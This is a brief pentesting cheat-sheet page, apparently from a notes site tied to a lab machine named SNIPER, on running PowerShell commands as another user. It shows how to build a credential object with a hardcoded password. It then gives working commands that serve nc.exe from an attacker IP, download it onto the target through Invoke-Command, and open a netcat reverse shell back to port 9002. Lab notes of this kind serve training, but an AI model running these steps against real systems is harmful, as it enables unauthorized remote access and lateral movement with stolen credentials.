Powershell Runas

This is how to execute commands as a different user in Powershell. (similar to runas)

$Username = 'BOXNAME\user1'
$Password = 'sup3rs3cr3t123'
$pass = ConvertTo-SecureString -AsPlainText $Password -Force
$Cred = New-Object System.Management.Automation.PSCredential -ArgumentList $Username,$pass  
Invoke-Command -Computer BOXNAME -ScriptBlock { whoami }  -Credential $Cred

To get a reverse shell with a different user.

# Use python to share the file
python3 -m http.server 80

# Use powershell to download the file. In this case nc.exe
Invoke-Command -Computer SNIPER -ScriptBlock { IWR -uri 10.10.14.20/nc.exe -outfile nc.exe }  -Credential $Cred 

# Revser shell with powershell 
Invoke-Command -Computer SNIPER -ScriptBlock { cmd /c nc.exe 10.10.14.20 9002 -e powershell.exe }  -Credential $Cred

Another way of doing it.

Start-Process powershell -Credential domain\differentUserName -ArgumentList '-noprofile -command &{Start-Process "TheApp.exe" -verb runas}'

PreviousGuides NextLiving Off The Land Binaries and Scripts

Last updated 4 years ago